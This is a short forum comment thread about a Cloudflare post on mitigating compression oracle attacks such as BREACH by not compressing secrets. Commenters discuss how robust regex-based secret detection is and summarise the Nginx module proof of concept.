
A Solution to Compression Oracles on the Web - kawera
https://blog.cloudflare.com/a-solution-to-compression-oracles-on-the-web/
======
kardos
Selective compression does seem like a pretty optimal approach.

> We found that in most cases a secret within a webpage can be described in
> terms of a classical regular expression.

Not sure I'd want to rely on a regex that identifies the right chunk most of
the time..... that sounds fragile, easy to accidentally break with a routine
update of the page. Explicitly tagging the secret portion seems like a more
robust approach.

------
kureikain
I though for BREACH to work, the user input have to echo on the page, together
with the secret. So that when they repeat, the compression size reduce.

If we didn't echo any user input data to the page, then we aren't affected by
BREACH, right?

------
crishoj
TL;DR — avoid compressing secrets.

The PoC is an Nginx module which identifies potentially secret parts of the
response using a regular expression matcher, and avoids adding these to the
compression dictionary.

